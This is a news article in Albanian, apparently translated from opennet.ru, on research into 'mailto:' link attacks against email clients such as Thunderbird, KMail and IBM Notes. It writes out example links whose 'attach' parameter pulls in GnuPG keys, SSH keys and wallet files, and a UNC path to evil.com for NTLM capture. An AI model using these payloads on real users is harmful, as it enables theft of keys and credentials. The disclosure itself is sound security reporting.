Sulmi ndaj përdoruesve të klientëve të postës përmes lidhjeve «mailto:»

Kërkuesit nga Universiteti Ruhr në Bochum (Gjermani) analizuan (PDF) sjellja e klientëve të postës në përpunimin e lidhjeve «mailto:» me parametra të zgjeruar. Pesë nga njëzet klientët e shqyrtuar të postës rezultuan të prekshëm ndaj një sulmi që manipulohet me zëvendësimin e burimeve duke përdorur parametrin «attach». Gjithashtu, gjashtë klientë të tjerë të postës ishin të ndjeshëm ndaj sulmeve për këmbimin e çelësave PGP dhe S/MIME, ndërsa tre klientë rezultuan të prekshëm për sulmet që nxjerrin përmbajtjen e mesazheve të enkriptuara.

Lidhjet «mailto:» përdoren për automatizimin e hapjes së klientit të postës me qëllim të shkruarit të një letre për adresatin e caktuar në lidhje. Përveç adresës në lidhje, mund të shënohen parametra të shtuar, siç është tema e letrës dhe një shabllon i përmbajtjes standarde. Sulmi i propozuar manipulon parametrin «attach», i cili lejon që të bashkëngjitet një bashkëngjitje në letrën që krijohet.

Klientët e postës Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) dhe Pegasus Mail rezultuan të prekshëm ndaj një sulmi trivial që lejon bashkëngjitjen automatike të çdo file lokale e cila është e specifikuar përmes një lidhjeje të tipit «mailto:?attach=rruga_tek_file». Fileja bashkëngjitet pa paraqitjen e një paralajmërimi, kështu që pa ndonjë theks të veçantë përdoruesi mund të mos e vërejë se letra do të dërgohet me bashkëngjitje.

Për shembull, duke përdorur një lidhje të tipit «mailto:?to=user@example.com&subject=Titulli&body=Teksti&attach=~/.gnupg/secring.gpg» është e mundur të vendoset në letër çelësat privat të GnuPG. Po ashtu, mund të dërgohen përmbajtjet e kriptokoshëve (~/.bitcoin/wallet.dat), çelësat SSH (~/.ssh/id_rsa) dhe çdo file tjetër që është në dispozicion për përdoruesin. Për më tepër, Thunderbird lejon bashkëngjitjen e grupeve të fileve sipas maskës duke përdorur konstrukte të tipit «attach=/tmp/*.txt».

Përveç fileve lokale, disa klientë të postës përpunojnë lidhje për magazinat në rrjet dhe rrugët në serverët IMAP. Në veçanti, IBM Notes lejon kalimin e një file nga katalogu në rrjet gjatë përpunimit të lidhjeve të tipit «attach=\\evil.com\dummyfile», si dhe kapjen e parametrave të autentikimit NTLM duke dërguar një lidhje në serverin SMB të kontrolluar nga sulmuesi (kërkesa do të dërgohet me parametrat aktual të autentikimit të përdoruesit).

Thunderbird përpunon me sukses kërkesat si «attach=imap://fetch>UID>/INBOX>1/», duke lejuar ngjitur përmbajtjen nga dosjet në IMAP-server. Në të njëjtën kohë, mesazhet e nxjerra nga IMAP, të koduara me OpenPGP dhe S/MIME, automatikisht dekriptohen nga klienti i postës përpara se të dërgohen. Zhvilluesit e Thunderbird ishin njoftuar në dijeni për problemin në shkurt dhe në publikimin Thunderbird 78 problemi tani është zgjidhur (degat Thunderbird 52, 60 dhe 68 mbeten të ndjeshme).

Versionet e vjetra të Thunderbird janë të ndjeshme gjithashtu ndaj dy varianteve të tjera të sulmit ndaj PGP dhe S/MIME, të propozuara nga hulumtuesit. Veçanërisht, sulmi i zëvendësimit të çelësave u aplikua tek Thunderbird, si dhe tek OutLook, PostBox, eM Client, MailMate dhe R2Mail2, duke rezultuar nga fakti se klienti i postës importon dhe instalon automatikisht certifikatat e reja të përcjella në mesazhet S/MIME, duke i lejuar sulmuesit të zëvendësojnë çelësat publikë të ruajtur më parë nga përdoruesi.

Sulmi i dytë, i cili prek Thunderbird, PostBox dhe MailMate, manipuloj me veçoritë e mekanizmit të ruajtjes së automatikisht të skicave të mesazheve dhe lejon, përmes parametrave mailto, të niste dekriptimin e mesazheve të koduara ose të shtojë një nënshkrim digjital për mesazhe të rastësishme, me përçimin e rezultatit në IMAP-serverin e sulmuesit. Teksti i koduar në këtë sulm dërgohet përmes parametrave «body», ndërsa për të iniciuar një thirrje për tek IMAP-serveri i sulmuesit përdoret etiketa «meta refresh». Për shembull: ‘’

Dokumentet PDF të strukturuara posaçërisht mund të përdoren për përpunimin automatik të lidhjeve «mailto:» pa ndërhyrjen e përdoruesit — veprimi OpenAction në PDF lejon të nisë automatikisht procesorin mailto kur hapet dokumenti:

%PDF-1.5
1 0 obj
<>
endobj

2 0 obj
<>
endobj

Sulmi ndaj përdoruesve të klientëve të postës përmes lidhjeve "mailto:"

Burimi: opennet.ru

Blini hosting të besueshëm për faqe interneti me mbrojtje nga DDoS, serverë VPS VDS 🔥 Blini hosting të besueshëm për faqe interneti me mbrojtje nga DDoS, serverë VPS VDS | ProHoster